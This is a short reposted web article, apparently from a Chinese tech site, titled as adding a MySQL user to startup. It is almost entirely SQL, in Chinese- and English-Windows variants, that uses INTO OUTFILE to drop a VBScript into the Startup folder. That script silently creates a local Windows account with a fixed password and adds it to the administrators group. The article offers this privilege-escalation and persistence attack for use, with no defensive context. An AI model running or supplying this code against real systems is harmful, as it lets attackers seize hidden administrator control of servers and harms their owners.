Home  >  Article  >  Database  >  MySQL中英文添加用户到启动_MySQL

MySQL中英文添加用户到启动_MySQL

WBOY
WBOYOriginal
2016-06-01 13:47:46900browse

bitsCN.com 中文版本操作系统中针对mysql添加用户完整代码:
use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/a.vbs";
drop table a;英文版本:use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/a.vbs";
drop table a; bitsCN.com

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn